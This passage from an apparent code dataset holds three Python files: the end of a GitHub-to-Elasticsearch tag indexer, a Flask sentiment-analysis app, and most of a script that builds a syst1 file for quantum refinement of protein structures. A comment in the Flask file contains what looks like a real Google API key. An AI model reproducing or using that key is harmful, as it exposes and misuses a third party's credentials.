gh.get_organization(github_org)\n\n logging.info(\"getting repos\")\n repos = list(org.get_repos())\n\n logging.info(\"getting tags\")\n repos_and_tags = do_work(repos, get_tags, num_workers)\n\n return repos_and_tags\n\n\ndef update_index(github_org: str, repos: List[Dict]) -> None:\n \"\"\"create/update repo docs in Elasticsearch\"\"\"\n es = Elasticsearch(ES_ENDPOINT)\n es.indices.create(index=ES_INDEX, ignore=400)\n\n logging.info(\"starting ES doc creation\")\n for repo in repos:\n doc = {\n \"org\": github_org,\n \"repo\": repo[\"name\"],\n \"tags\": repo[\"tags\"],\n \"timestamp\": \"T\".join(str(datetime.datetime.utcnow()).split()),\n }\n es.index(index=ES_INDEX, doc_type=ES_DOC_TYPE, id=repo[\"name\"], body=doc)\n logging.info(\"finished ES doc creation\")\n\n\ndef main() -> None:\n \"\"\"entrypoint\"\"\"\n args = parse_args()\n github_org = getattr(args, GITHUB_ORG_ARGNAME)[0]\n num_workers = getattr(args, NUM_WORKERS_ARGNAME)\n\n if not GITHUB_API_TOKEN:\n print(\"GITHUB_API_TOKEN environment variable not set\")\n return\n\n repos_and_tags = get_repos_and_tags(github_org, num_workers)\n update_index(github_org, repos_and_tags)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"397763140","text":"from flask import Flask, render_template\nimport os\nimport sys\nfrom flask import request\nfrom random import randint\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/find-emotion', methods=['POST'])\ndef result():\n \n content = request.form.get('content')\n \n flag, sentiment_meter = get_sentiment(content) \n \n result = {\n 'car_brand' : content,\n 'flag': flag,\n 'sentiment_meter' : sentiment_meter \n }\n \n #return content\n return render_template('result.html', result=result)\n\nsid = SentimentIntensityAnalyzer()\n\ndef get_sentiment(sentence):\n \n print(sentence)\n\n ss = sid.polarity_scores(sentence)\n \n #print(type(ss['pos']))\n\n positive_meter = round((ss['pos'] * 10), 2) \n negative_meter = round((ss['neg'] * 10), 2)\n\n '''\n for k in sorted(ss):\n #print(ss)\n print('{0}: {1}, '.format(k, ss[k]), end = '')\n '''\n\n print('positive : {0}, negative : {1}'.format(positive_meter, negative_meter))\n\n if(positive_meter > negative_meter):\n return True, positive_meter\n else:\n return False, negative_meter\n \nif __name__ == '__main__':\n host = os.environ.get('IP', '127.0.0.1')\n port = int(os.environ.get('PORT', 5000))\n \n app.run(host= host, port = port, use_reloader = False)\n \n \n'''\nSources:\n http://www.compjour.org/lessons/flask-single-page/multiple-dynamic-routes-in-flask/\n \n https://www.learnpython.org/en/String_Formatting\n \n https://stackoverflow.com/questions/25888396/how-to-get-latitude-longitude-with-python\n \n https://github.com/googlemaps/google-maps-services-python\n \n AIzaSyCRhRz_mw_5wIGgF-I6PUy3js6dcY6zQ6Q\n \n Get Current Location:\n https://stackoverflow.com/questions/44218836/python-flask-googlemaps-get-users-current-location-latitude-and-longitude\n'''","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81809481","text":"#!/usr/bin/env 
python3\n#######!/software/sse/easybuild/prefix/software/Anaconda3/5.3.0-extras-nsc1/bin-wrapped/python \n# -*- coding: utf-8 -*-\n\n# run with protonation: gen_syst1.py qm.tex pdb P\n# run without protonation: gen_syst1.py qm.tex pdb \n\n## program to automatise teh generation \n#of the syst1 file for quantum refinment\n\n\nimport time\n## set timer\ntime_start = time.time()\nimport sys\n##load mandatory modules\nimport numpy as np\n#import numpy as np\nprint(sys.argv)\nif len(sys.argv)>=2:\n qm=sys.argv[1]\n print(\"read from line 1\")\nelse:\n qm=\"qm.txt\"\n\n\nif len(sys.argv)>=3:\n input_pdb=sys.argv[2]\n print(\"read from line 2\")\nelse:\n input_pdb=\"comqum.pdb\"\n\nf_p=False\nif len(sys.argv)>=4:\n pq=sys.argv[3]\n print(pq)\n if pq == \"P\" or pq == \"p\":\n f_p=True\n print(\"protonation is on\")\n\n\n\n\ndef read_pdb(input_pdb):\n## reads in pdb coordinates hardcodedt\n##https://zhanglab.ccmb.med.umich.edu/BindProfX/pdb_atom_format.html\n##COLUMNS DATA TYPE CONTENTS\n##--------------------------------------------------------------------------------\n ##1 - 6 Record name \"ATOM \"\n## 7 - 11 Integer Atom serial number.\n##13 - 16 Atom Atom name.\n##17 Character Alternate location indicator.\n##18 - 20 Residue name Residue name.\n##22 Character Chain identifier.\n##23 - 26 Integer Residue sequence number.\n##27 AChar Code for insertion of residues.\n##31 - 38 Real(8.3) Orthogonal coordinates for X in Angstroms.\n##39 - 46 Real(8.3) Orthogonal coordinates for Y in Angstroms.\n##47 - 54 Real(8.3) Orthogonal coordinates for Z in Angstroms.\n##55 - 60 Real(6.2) Occupancy.\n##61 - 66 Real(6.2) Temperature factor (Default = 0.0).\n##73 - 76 LString(4) Segment identifier, left-justified.\n##77 - 78 LString(2) Element symbol, right-justified.\n##79 - 80 LString(2) Charge on the atom.\n print(\" read pdb file\")\n read_pdb = open(input_pdb, \"r\")\n org_pdb =[]\n work_pdb =[]\n f_head=False\n head=[]\n for line in read_pdb:\n idef = line[0:6].strip()\n if idef==\"ATOM\" or idef==\"HETATM\":\n f_head=True\n l_pdb=[]\n a = line[0:6].strip()\n a_num = int(line[6:11].strip())\n a_name = line[12:16].strip()\n alter = line[16].strip()\n res_name= line[17:20].strip()\n chain = line[21].strip()\n res_num = int(line[22:26].strip())\n inser = line[26].strip()\n x = float(line[30:38].strip())\n y = float(line[38:46].strip())\n z = float(line[46:54].strip())\n occ = float(line[54:60].strip())\n b_fac = float(line[60:66].strip())\n seg_i = line[72:76].strip()\n ele = line[76:78].strip()\n charge = line[78:80].strip()\n\n l_pdb.append(a)\n l_pdb.append(a_num)\n l_pdb.append(a_name)\n l_pdb.append(alter)\n l_pdb.append(res_name)\n l_pdb.append(chain)\n l_pdb.append(res_num)\n l_pdb.append(inser)\n l_pdb.append(x)\n l_pdb.append(y)\n l_pdb.append(z)\n l_pdb.append(occ)\n l_pdb.append(b_fac)\n l_pdb.append(seg_i)\n l_pdb.append(ele)\n l_pdb.append(charge)\n#[0, 1 , 2 , 3 , 4 , 5 , 6, , 7 , 8, 9,10\n#[a, a_num, a_name, alter, res_name, chain, res_num, inser, x, y, z\n#11 , 12 , 13 , 14 , 15\n#occ, b_fac, seg_i, ele, charge]\n org_pdb.append(l_pdb)\n work_pdb.append(l_pdb)\n# print(l_pdb)\n if f_head==False:\n head.append(line)\n print(\"close file:\", input_pdb)\n return org_pdb, work_pdb, head\n\n\ndef read_qm(qm):\n## read in atoms or resiodues for the qm system\n## inly actueal atoms trancuation ateoms are definem on it own\n## ATOM in PDB formart\n## RESI only one number\n## ANAM atom name with chain and residue\n## ANUM atom number\n print(\" read qm file\")\n read_qm_f = open(qm, \"r\")\n qm_atom = 
[]\n qm_resi = []\n qm_anam = []\n qm_anum = []\n qm_rnum = []\n for line in read_qm_f:\n idef = line[0:6].strip()\n idef2= line.split()\n \n if idef==\"ATOM\" or idef==\"HETATM\":\n\n l_pdb=[]\n a = line[0:6]\n a_num = int(line[6:11].strip())\n a_name = line[12:16]\n alter = line[16]\n res_name= line[17:20]\n chain = line[21]\n res_num = int(line[22:26].strip())\n\n l_pdb.append(a)\n l_pdb.append(a_num)\n l_pdb.append(a_name)\n l_pdb.append(alter)\n l_pdb.append(res_name)\n l_pdb.append(chain)\n l_pdb.append(res_num)\n qm_atom.append(l_pdb)\n\n if len(idef2)>=1:\n if idef==\"RESI\" or idef2[0]==\"RESI\":\n s_line=line.split()\n l_resi=[]\n l_resi.append(s_line[1])\n l_resi.append(int(s_line[2]))\n qm_resi.append(l_resi)\n \n\n if idef==\"ANAM\" or idef2[0]==\"ANAM\":\n s_line=line.split()\n l_resi=[]\n l_resi.append(s_line[1])\n l_resi.append(int(s_line[2]))\n if len(s_line)<4:\n s_line.append(\" \")\n l_resi.append((s_line[3]))\n qm_anam.append(l_resi)\n\n if idef==\"ANUM\" or idef2[0]==\"ANUM\":\n s_line=line.split()\n l_resi=[]\n l_resi.append(int(s_line[1]))\n qm_anum.append(l_resi)\n\n if idef==\"RNUM\" or idef2[0]==\"RNUM\":\n s_line=line.split()\n l_resi=[]\n l_resi.append(int(s_line[1]))\n l_resi.append(int(s_line[2]))\n qm_rnum.append(l_resi)\n\n\n print(\"close file:\", qm)\n return qm_atom, qm_resi, qm_anam, qm_anum, qm_rnum\n\n\ndef assign_atm_nr(qm_atom, qm_resi, qm_anum, qm_anam, qm_rnum ,pdb):\n atm_nr=[]\n atm_qm=[]\n if len(qm_atom)>0:\n for i in range(len(qm_atom)):\n res_num= qm_atom[i][6]\n chain = qm_atom[i][5].strip()\n a_name = qm_atom[i][2].strip()\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n res_num_pdb = pdb[j][k][6]\n chain_pdb = pdb[j][k][5].strip()\n a_name_pdb = pdb[j][k][2].strip()\n if res_num == res_num_pdb and chain == chain_pdb and a_name == a_name_pdb:\n atm_nr.append(pdb[j][k][1])\n atm_qm.append(pdb[j][k])\n\n\n if len(qm_resi)>0:\n for i in range(len(qm_resi)):\n res_num= qm_resi[i][1]\n chain = qm_resi[i][0].strip()\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n res_num_pdb = pdb[j][k][6]\n chain_pdb = pdb[j][k][5].strip()\n# print(res_num, res_num_pdb)\n if res_num == res_num_pdb and chain == chain_pdb:\n# print(work_pdb[j][1])\n atm_nr.append(pdb[j][k][1])\n atm_qm.append(pdb[j][k])\n \n if len(qm_anum)>0:\n for i in range(len(qm_anum)):\n a_num=qm_anum[i][0]\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n a_num_pdb=pdb[j][k][1]\n if a_num == a_num_pdb:\n atm_nr.append(pdb[j][k][1])\n atm_qm.append(pdb[j][k])\n\n\n if len(qm_anam)>0:\n for i in range(len(qm_anam)):\n res_num= qm_anam[i][1]\n chain = qm_anam[i][2].strip()\n a_name = qm_anam[i][0].strip()\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n res_num_pdb = pdb[j][k][6]\n chain_pdb = pdb[j][k][5].strip()\n a_name_pdb = pdb[j][k][2].strip()\n if res_num == res_num_pdb and chain == chain_pdb and a_name == a_name_pdb:\n atm_nr.append(pdb[j][k][1])\n atm_qm.append(pdb[j][k])\n \n if len(qm_rnum)>0:\n for i in range(len(qm_rnum)):\n low = qm_rnum[i][0]\n up = qm_rnum[i][1]\n# print(low,up)\n for j in range(len(pdb)):\n a_num_pdb=pdb[j][k][1]\n # print(a_num_pdb, low,up)\n if low <= a_num_pdb <= up:\n atm_nr.append(pdb[j][k][1])\n atm_qm.append(pdb[j][k])\n\n\n\n atm_nr = list(set(atm_nr))\n atm_nr= sorted(atm_nr)\n atom_qm=[]\n# print(atm_nr)\n# print(atm_qm)\n for i in range(len(atm_nr)):\n for j in range(len(atm_qm)):\n# print(atm_qm[j])\n if atm_nr[i]== atm_qm[j][1]:\n atom_qm.append(atm_qm[j])\n break\n \n \n return atm_nr, atom_qm\ndef 
len3dvec(vec):\n## calculates length of a 3D vector\n## input as list\n    a = np.sqrt(vec[0]**2 + vec[1]**2 + vec[2]**2)\n    return a\n\ndef find_truncation(atm_nr, atom_qm, pdb):\n## search for truncation atoms in a radius of 1.8 A around atoms\n    trunc_nr = []\n    trunc_atm= []\n    print(atom_qm)\n    for i in range(len(atom_qm)):\n        vec1=[0,0,0]\n        vec1[0] = atom_qm[i][8]\n        vec1[1] = atom_qm[i][9]\n        vec1[2] = atom_qm[i][10]\n        for j in range(len(pdb)):\n            for k in range(len(pdb[j])):\n                vec2=[0,0,0]\n                vec2[0] = pdb[j][k][8]\n                vec2[1] = pdb[j][k][9]\n                vec2[2] = pdb[j][k][10]\n                vec=[0,0,0]\n                for h in range(len(vec)):\n                    vec[h]=vec1[h]-vec2[h]\n                lenvec= len3dvec(vec)\n                if 0.5 < lenvec <= 1.8:\n                    trunc_nr.append(pdb[j][k][1])\n                    trunc_atm.append(pdb[j][k])\n# print(\"trunc_nr\",trunc_nr)\n\n    trunc_nr=sorted(list(set(trunc_nr)))\n# print(len(trunc_nr),\"trunc_nr2\",trunc_nr)\n# print(\"atm_nr\",atm_nr)\n    trunc_nr = list(set(trunc_nr)-set(atm_nr))\n    trunc_atom=[]\n# print(\"trunc_atm\",trunc_atm)\n# print(\"trunc_nr\",trunc_nr)\n    for i in range(len(trunc_nr)):\n        for j in range(len(trunc_atm)):\n            if trunc_nr[i]==trunc_atm[j][1]:\n                trunc_atom.append(trunc_atm[j])\n                break\n    return trunc_nr, trunc_atom\n\n\n\ndef sum_list(atm_nr, atom_qm, trunc_nr, trunc_atm):\n## define lists of QM atoms and truncation atoms\n    f_trunc=[]\n    f_all= atm_nr + trunc_nr\n    for i in range(len(trunc_atm)):\n        if trunc_atm[i][14].strip() != \"H\":\n            f_trunc.append(trunc_atm[i][1])\n# if trunc_atm[i][2].strip() != \"H\":\n# f_trunc.append(trunc_atm[i][1])\n \n    f_all = sorted(list(set(f_all)))\n    f_trunc=sorted(list(set(f_trunc)))\n    f_qm=list(set(f_all)-set(f_trunc))\n    f_qm = sorted(list(set(f_qm)))\n\n    return f_all, f_qm, f_trunc\n\n\ndef write_syst1(f_all,f_trunc):\n\n    syst1=open(\"syst1\",\"w\")\n    syst1.write(\"comment \\n\")\n    f_comp=compress_list(f_all)\n    for i in range(len(f_comp)):\n        if len(f_comp[i])==1:\n            string=str(f_comp[i][0])+\" \\n\"\n        if len(f_comp[i])==2:\n            string = str(f_comp[i][0])+\"-\"+str(f_comp[i][1])+\" \\n\"\n        syst1.write(string)\n    syst1.write(\" \\n\")\n    for i in range(len(f_trunc)):\n        string=str(f_trunc[i])+\" \\n\"\n        syst1.write(string)\n    syst1.write(\" \\n \\n \\n\")\n    syst1.close()\n    print(\"syst1 file is ready\")\n\ndef compress_list(list_in):\n    list_out=[]\n# print(\"len(list_in)\",len(list_in))\n    second = False\n    for i in range(len(list_in)):\n# print(second, i, )\n\n        if i == 0:\n            pm = -1\n            pp = list_in[i+1]-1\n            p = list_in[i]\n        if 0 < i < len(list_in)-1:\n            pm = list_in[i-1]+1\n            pp = list_in[i+1]-1\n            p = list_in[i]\n        if i == len(list_in)-1:\n            pm = list_in[i-1]+1\n            pp = -1\n            p = list_in[i]\n\n\n# print(i, list_in[i],p,pm,pp, second)\n        if second == False:\n            if p != pm and p == pp:\n                list_out.append([list_in[i]])\n                second = True\n            if p != pm and p != pp:\n                list_out.append([list_in[i]])\n                second = False\n            continue\n        if second == True :\n            if p == pm and p == pp :\n# print(\"###############\")\n                continue\n            if p == pm and p != pp :\n# print(\"!!!!!!!!!!!\")\n                list_out[len(list_out)-1].append(list_in[i])\n                second = False\n            if p != pm and p != pp :\n# print(\"¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\")\n                list_out.append([list_in[i]])\n                second = False\n\n# print(\"len(list_out)\",len(list_out))\n    return list_out\n\n\n\ndef write_restart_anam(f_qm,work_pdb):\n## write input to restart this program\n    r_anam=open(\"restart_anam\",\"w\")\n    w_pdb=open(\"pdb_syst1\",\"w\")\n# w_label=open(\"label_vis.sh\",\"w\")\n    atm_nr=0\n    for i in range(len(f_qm)):\n        for j in range(len(work_pdb)):\n            if f_qm[i]==work_pdb[j][1]:\n# print(work_pdb[j])\n                string=\"ANAM \"+ 
work_pdb[j][2]+\" \"+str(work_pdb[j][6])+\" \" + work_pdb[j][5] + \"\\n\"\n s_pdb, atm_nr= write_pdbi_line(work_pdb[j], atm_nr)\n# s_label=prep_vis(work_pdb[j])\n r_anam.write(string)\n w_pdb.write(s_pdb)\n# w_label.write(s_label)\n\ndef write_rename(f_all,f_trunc,work_pdb):\n w_label=open(\"label_vis.sh\",\"w\")\n for i in range(len(f_all)):\n for j in range(len(work_pdb)):\n if f_all[i]==work_pdb[j][1]:\n ele=work_pdb[j][14]\n if f_all[i] in f_trunc:\n ele=\"H\"\n\n s_label=prep_vis(work_pdb[j],ele)\n w_label.write(s_label)\n\ndef prep_vis(pdb,ele):\n#preper bash file for the corect labeling of the pdb file from mimic\n#[0, 1 , 2 , 3 , 4 , 5 , 6, , 7 , 8, 9,10\n#[a, a_num, a_name, alter, res_name, chain, res_num, inser, x, y, z\n#11 , 12 , 13 , 14 , 15\n#occ, b_fac, seg_i, ele, charge]\n\n res_nam= pdb[4]\n res_num= pdb[6]\n chain= pdb[5]\n string=\"sed -i \\\"0,/\"\n string = string + str('{:2}'.format(ele))\n# string = string + \" ??? 1/s//\"\n string = string + \" ??? 1/s/\"\n string = string + str('{:2}'.format(ele))\n string = string + \" ??? 1/\"\n\n\n string = string + str('{:2}'.format(ele))\n string = string + \" \"\n string = string + str(res_nam) + \" \"\n string = string + str(chain)#+ \" \"\n string = string + str('{:4}'.format(res_num))\n string = string + \"/g\\\" pdb\"\n string = string + \"\\n\"\n return string\n\ndef write_pdbi_line(pdb, atm_nr):\n## wite out PDB file\n atm_nr = atm_nr + 1\n string = str('{:6}'.format(pdb[0]))\n string = string + str('{:5.0f}'.format(atm_nr))\n string = string + \" \"\n string = string + str('{:3s}'.format(str(pdb[2])))\n string = string + str('{:1}'.format(pdb[3]))\n string = string + str('{:3}'.format(pdb[4]))\n string = string + str('{:>2}'.format(pdb[5]))\n string = string + str('{:4}'.format(pdb[6]))\n string = string + str('{:1}'.format(pdb[7]))\n string = string + \" \"\n string = string + str('{:8.3f}'.format(pdb[8]))\n string = string + str('{:8.3f}'.format(pdb[9]))\n string = string + str('{:8.3f}'.format(pdb[10]))\n string = string + str('{:6.2f}'.format(pdb[11]))\n string = string + str('{:6.2f}'.format(pdb[12]))\n string = string + str('{:>7}'.format(pdb[13]))\n string = string + str('{:>5}'.format(pdb[14]))\n\n\n string = string + \"\\n\"\n return string, atm_nr\n\n\ndef atm_to_res(pdb_read):\n# sort pdb in residues\n pdb=[]\n pdb.append([pdb_read[0]])\n for i in range(1,len(pdb_read)):\n if pdb_read[i][6] != pdb_read[i-1][6]:\n# print(len(pdb))\n pdb.append([pdb_read[i]])\n if pdb_read[i][6] == pdb_read[i-1][6]:\n pdb[len(pdb)-1].append(pdb_read[i])\n\n return pdb\n\ndef proto_qm(pdb,atom_qm,f_p):\n# protonates qm system if protons are not existing\n# print(\"protonate syst1\")\n if f_p== False:\n return pdb\n print(\"protonate syst1\")\n for i in range(len(atom_qm)):\n# print(\"protonate syst1\")\n\n# print(atom_qm[i])\n xyz=[atom_qm[i][8],atom_qm[i][9],atom_qm[i][10]]\n# print(xyz)\n ele=atom_qm[i][14]\n# print(ele)\n# print(atom_qm[i])\n if ele==\"C\":\n pdb=prot_c(pdb,xyz,ele,atom_qm[i])\n if ele==\"N\":\n pdb=prot_n(pdb,xyz,ele,atom_qm[i])\n if ele==\"O\":\n pdb=prot_o(pdb,xyz,ele,atom_qm[i])\n return pdb\n\ndef prot_n(pdb,xyz,ele,atom_qm):\n## identyfy atom pype and protanes it\n bond_atom=f_bond_atoms(pdb,atom_qm)\n n_bonds=def_n_bonds(xyz,ele,bond_atom)\n if 1.5< n_bonds <= 2.5 and len(bond_atom)==2:\n pdb= ad_NH_s(pdb,bond_atom[0],bond_atom[1],atom_qm)\n return pdb\n if n_bonds==1 and len(bond_atom)==1:\n pdb=ad_NH2(pdb,bond_atom[0],atom_qm)\n return pdb\n return pdb\n\n\ndef ad_NH2(pdb, A2, A3):\n# ad 2H as NH2 
group to A3\n# print(\"¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\")\n r = 1.012\n Ad = 120\n Dd = 180\n Dd1 = 0\n A1=find_A1(pdb,A3,A2) \n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd1)\n nam=list(A3[2])\n name = str(nam[0])\n\n name1 = \"H1\"+name\n name2 = \"H2\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n\n return pdb\n\n\n\n\n\n\n\ndef ad_NH_s(pdb, A1, A2, A3):\n# ad H as NH (SP2) group to A3\n# print(\"atoms treatet\")\n# print(\"A3\",A3)\n# print(\"A2\",A2)\n# print(\"A1\",A1)\n r = 1.032\n Ad = 120\n Dd = 180\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[0]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"H\"+name\n\n# print(\"name1\",name1)\n# print(adH1)\n# print(A3)\n# print(\"next step ad to pdb\")\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n# print(\"addet to pdb\")\n# print(\"&&&&&&&&&&&&&&&TEST&&&&&&&&&&&&\")\n return pdb\n\n\ndef prot_o(pdb,xyz,ele,atom_qm):\n## identyfy atom pype and protanes it\n bond_atom=f_bond_atoms(pdb,atom_qm)\n n_bonds=def_n_bonds(xyz,ele,bond_atom)\n# print(\"atom_qm\",n_bonds,len(bond_atom), atom_qm)\n# if atom_qm[4]==\"HOH\":\n# print(bond_atom)\n if n_bonds >= 2:\n return pdb\n if n_bonds==1 and len(bond_atom)==1:\n pdb=ad_OH(pdb,bond_atom[0],atom_qm)\n if n_bonds==0 and atom_qm[4]==\"HOH\":\n pdb = ad_OH_water(pdb,atom_qm)\n return pdb\n\n\ndef ad_OH_water(pdb,atom_qm):\n## protonates water in direction of posible hydrogen bonds\n print(atom_qm)\n l_vdw=vdw()\n l_h_bonds=find_h_bond(atom_qm,pdb,l_vdw)\n# for i in range(len(l_h_bonds)):\n# print(\"l_h_bonds\",l_h_bonds[i])\n if len(l_h_bonds)>=1:\n# print(\"######################adH1#######################\")\n adH1=find_short_H(atom_qm,l_h_bonds)\n if adH1[0]==0:\n return pdb\n name1 =\"H1\"+atom_qm[2]\n pdb = add_to_pdb(pdb, atom_qm, adH1, name1)\n if len(l_h_bonds)>=2: \n# print(\"______________________________adH2_______________________\")\n adH2=find_short_H(atom_qm,l_h_bonds)\n if adH2[0]==0:\n return pdb\n name2 =\"H2\"+atom_qm[2]\n pdb = add_to_pdb(pdb, atom_qm, adH2, name2)\n\n return pdb\n\n\ndef find_short_H(atom_qm,l_h_bonds):\n## finds shortest istace in list of coordinates\n P1=[atom_qm[8],atom_qm[9],atom_qm[10]]\n d_min=1000000\n for i in range(len(l_h_bonds)):\n P2=[l_h_bonds[i][8],l_h_bonds[i][9],l_h_bonds[i][10]]\n dist=CDist2(P1,P2)\n if dist< d_min:\n exist=f_ex_h(pdb, P1, P2)\n# print(\"exist\",exist)\n# if exist == True:\n# print(\"l_h_bonds[i]\",l_h_bonds[i])\n if exist == False:\n d_min=dist\n atom_min=l_h_bonds[i]\n\n P_s=[atom_min[8],atom_min[9],atom_min[10]]\n vec=twoP_to_vec(P1,P_s)\n# print(\"len3Dvec(vec)\",len3dvec(vec))\n h_vec=resize_vec(vec,0.98)\n# print(\"len3Dvec(h_vec)\",len3dvec(h_vec))\n \n coord=[P1[0]+h_vec[0],P1[1]+h_vec[1],P1[2]+h_vec[2]]\n if coord == P1:\n coord= [0]\n return coord\n\ndef f_ex_h(pdb, A1, A2):\n#check if hydrogen is positiond in 30 deree to OHO distance\n## false if proton not existing true if existing\n flag=False\n dh=1.5\n max_dist=0.6\n for j in range(len(pdb)):\n for k in range(len(pdb[j])): \n if pdb[j][k][14]==\"H\" or pdb[j][k][14]==\"D\" :\n p0=[pdb[j][k][8],pdb[j][k][9],pdb[j][k][10]]\n d1= CDist2(A1,p0)\n d2=CDist2(A2,p0)\n ang=CAngle(A1,p0,A2)\n if d1 <= dh or d2 <=dh:\n if 120 <= ang <= 220:\n# print(\"ATOM 
H\",pdb[j][k])\n# print(\"ang\",ang)\n                        flag=True\n\n\n    return flag\n\n\ndef d_p_to_line(p0,p1,p2):\n## calculate distance between a point0 and a line between p1 and p2\n    if (p1[0] == p2[0] and p1[1] == p2[1] and p1[2] == p2[2]):\n        d=0\n    else:\n        if (p2[0]-p1[0] != 0):\n            t=-((p1[0]-p0[0])*(p2[0]-p1[0]))/((abs(p2[0]-p1[0]))**2)\n        elif (p2[1]-p1[1] != 0 ):\n            t=-((p1[1]-p0[1])*(p2[1]-p1[1]))/((abs(p2[1]-p1[1]))**2)\n        elif ( p2[2]-p1[2] != 0):\n            t=-((p1[2]-p0[2])*(p2[2]-p1[2]))/((abs(p2[2]-p1[2]))**2)\n\n        d2=((p1[0]-p0[0])+(p2[0]-p1[0])*t)**2+((p1[1]-p0[1])+(p2[1]-p1[1])*t)**2+((p1[2]-p0[2])+(p2[2]-p1[2])*t)**2\n        d=d2**(0.5)\n    return d\n\n\n\n\ndef resize_vec(vec,r):\n    vec=Normlz(vec)\n# print(\"len3Dvec(vec)\",len3dvec(vec))\n\n    new_vec=[vec[0]*r,vec[1]*r,vec[2]*r]\n\n    return new_vec\n\ndef find_h_bond(atom_qm,pdb,l_vdw):\n    OO=l_vdw[3][1]+l_vdw[3][1]\n    ON=l_vdw[3][1]+l_vdw[4][1]\n\n    h_bond=[]\n    O=[atom_qm[8],atom_qm[9],atom_qm[10]]\n    for j in range(len(pdb)):\n        for k in range(len(pdb[j])):\n            if pdb[j][k][14]==\"O\" or pdb[j][k][14]==\"N\" :\n# print(pdb[k][6],l_water[i][j][6])\n                if pdb[j][k][6]!=atom_qm[6]:\n                    acc=[pdb[j][k][8],pdb[j][k][9],pdb[j][k][10]]\n                    dist=CDist2(O,acc)\n                    if pdb[j][k][14]==\"O\":\n                        if dist <= OO:\n                            h_bond.append(pdb[j][k])\n                    if pdb[j][k][14]==\"N\":\n                        if dist <= ON:\n                            h_bond.append(pdb[j][k])\n\n    return h_bond\n\n\ndef vdw():\n    l_vdw=[[\"H\",1.20],[\"D\",1.20],[\"C\",1.70],[\"O\",1.52],[\"N\",1.55],[\"CL\",1.75],[\"F\",1.47],[\"BR\",1.85]]\n# h_vdw=1.20\n# c_vdw=1.70\n# o_vdw=1.52\n# n_vdw=1.55\n# s_vdw=1.80\n# cl_vdw= 1.75\n# f_vdw=1.47\n# br_vdw= 1.85\n    return l_vdw\n\n\ndef ad_OH(pdb, A2, A3):\n# add H as OH group to A3\n    r = 0.978\n    Ad = 106\n    Dd = 180\n    A1=find_A1(pdb,A3,A2)\n    A3xyz = [A3[8],A3[9],A3[10]]\n    A2xyz = [A2[8],A2[9],A2[10]]\n    A1xyz = [A1[8],A1[9],A1[10]]\n\n    adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n    name1 =\"H\"+A3[2]\n    pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n    return pdb\n\n\n\ndef prot_c(pdb,xyz,ele,atom_qm):\n## identify atom type and protonate it\n    bond_atom=f_bond_atoms(pdb,atom_qm)\n\n# print(bond_atom)\n# print(\"xyz###\",xyz)\n    n_bonds=def_n_bonds(xyz,ele,bond_atom)\n    res_num=atom_qm[6]\n    alter=atom_qm[3]\n    if n_bonds >= 4:\n        return pdb\n    if n_bonds==1:\n        pdb = ad_CH3(pdb,res_num,alter,bond_atom[0],atom_qm)\n \n    if n_bonds<=2.5 and len(bond_atom)==2:\n        pdb = ad_CH2(pdb, res_num, alter, bond_atom[0], bond_atom[1], atom_qm) \n    if 2.5< n_bonds<= 3.5 and len(bond_atom)==2:\n        pdb = ad_CH_ar(pdb, bond_atom[0], bond_atom[1], atom_qm)\n    if 2.5< n_bonds<= 3.5 and len(bond_atom)==3:\n        pdb = ad_CH_R3(pdb, bond_atom[0], bond_atom[1], atom_qm, bond_atom[2])\n\n# print(\"n_bonds\",ele,n_bonds)\n \n    return pdb\n\ndef ad_CH_R3(pdb, A1, A2, A3, A4):\n    r = 1.032\n    Ad = 109\n    Dd = 116\n    A3xyz = [A3[8],A3[9],A3[10]]\n    A2xyz = [A2[8],A2[9],A2[10]]\n    A1xyz = [A1[8],A1[9],A1[10]]\n    A4xyz = [A4[8],A4[9],A4[10]]\n\n    adH1 = H_tert(A1xyz, A2xyz, A3xyz, A4xyz,r)\n    name1 =\"H\"+A3[2]\n    pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n    return pdb\n\ndef H_tert(A1, A2, A3, A4,r):\n## set tertiary H on A3 at distance r\n    v1=twoP_to_vec(A3,A1)\n    v2=twoP_to_vec(A3,A2)\n    v3=twoP_to_vec(A3,A4)\n    v_sum=[0,0,0]\n    for i in range(len(v_sum)):\n        v_sum[i]=-(v1[i]+v2[i]+v3[i])\n\n    len_v_sum=len3dvec(v_sum)\n    H_vec=[0,0,0]\n    for i in range(len(v_sum)):\n        H_vec[i]=(r*v_sum[i])/len_v_sum\n    H_pos=[0,0,0]\n    for i in range(len(H_vec)):\n        H_pos[i]=A3[i]+H_vec[i]\n    return H_pos\n\n\n\n\ndef ad_CH_ar(pdb, A1, A2, A3):\n# add H as CH (SP2) group to A3\n    r = 1.014\n    Ad = 120\n    Dd = 180\n    A3xyz = 
